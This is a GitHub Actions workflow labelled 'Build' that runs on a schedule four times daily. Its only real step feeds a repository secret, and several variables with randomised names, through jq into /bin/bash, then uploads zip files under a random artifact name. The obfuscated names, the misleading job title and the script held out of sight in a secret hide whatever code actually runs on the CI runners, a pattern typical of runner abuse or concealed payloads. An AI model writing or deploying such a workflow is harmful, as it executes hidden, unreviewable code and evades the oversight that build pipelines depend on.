name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '8 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Invoke
        env:
          wxwnt25: ${{ secrets.wxwnt25 }}
        run: |
          printf '%s' "$wxwnt25" | jq -r .ayjyw76 | /bin/bash
          echo $ligd67 | jq -r .qr2590 | /bin/bash
          printf '%s' "$oo5467" | jq -r .vqe3 | /bin/bash
          echo $kine71962 | jq -r .a179 | /bin/bash
          echo $ops7 | jq -r .ucr064 | /bin/bash
          printf '%s' "$prw7" | jq -r .gxr6668 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ZyiHyMjc
          path: "*.zip"
          retention-days: 1
